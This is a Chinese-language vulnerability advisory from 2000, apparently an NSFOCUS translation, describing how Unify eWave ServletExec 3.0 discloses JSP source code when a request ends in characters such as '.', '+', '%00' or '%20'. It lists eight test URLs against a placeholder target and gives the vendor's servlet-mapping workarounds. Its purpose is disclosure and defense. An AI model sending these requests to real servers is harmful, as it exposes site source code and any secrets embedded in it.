首页 -> 安全研究

安全研究

安全漏洞
Unify eWave ServletExec泄漏JSP源代码

发布日期:2000-11-22
更新日期:2000-11-22

受影响系统:
Unify eWave ServletExec 3.0c
   - Sun Solaris 8.0
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000
   - Linux kernel 2.3.x
   - IBM AIX 4.3.2
   - HP HP-UX 11.4
Unify eWave ServletExec 3.0
   - Sun Solaris 8.0
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000
   - Linux kernel 2.3.x
   - IBM AIX 4.3.2
   - HP HP-UX 11.4
描述:

Unify eWave ServletExec是一个Java/Java Servlet引擎插件,用于主流web服务器如微软IIS、Apache、Netscape Enterprise Server等。

当收到一个尾部带有下面某个字符串的HTTP请求时,ServletExec将返回JSP文件的源代码:
.
%2E
+
%2B
\
%5C
%20
%00

成功地利用该漏洞可能导致泄漏包含在JSP页面中的敏感信息。

<* 来源:Wojciech Woch(Woch_W@admiral.fr) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


使用下面的任意一个URL请求将输出指定的JSP文件的源代码:
http://target/directory/jsp/file.jsp.
http://target/directory/jsp/file.jsp%2E
http://target/directory/jsp/file.jsp+
http://target/directory/jsp/file.jsp%2B
http://target/directory/jsp/file.jsp\
http://target/directory/jsp/file.jsp%5C
http://target/directory/jsp/file.jsp%20
http://target/directory/jsp/file.jsp%00




建议:

Unify技术支持部门给出如下解决办法:
如果你的web应用中没有使用任何静态页面或图像,则你可配置一个默认的servlet,并将“/”映射到这个默认的servlet。这样当收到一个未映射到某个servlet的URL时,这个默认的servlet就会被调用。在这种情况下,默认的servlet可以仅仅返回“未找到文件”。如果使用了静态的页面或图像,你仍然可以作这样的配置,但是需要让这个默认的servlet处理对合法的静态页面和图像的请求。

另一种可能就是将*.jsp+、*.jsp.和*.jsp\等映射到一个servlet,而该servlet只是返回“未找到文件”。对于*.jsp%00和*.jsp%20这样的情况,映射应以未经编码的形式输入。例如,对于*.jsp%20的映射应输入“*.jsp ”。注意%20被转换成一个空格字符。



浏览次数:6075
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障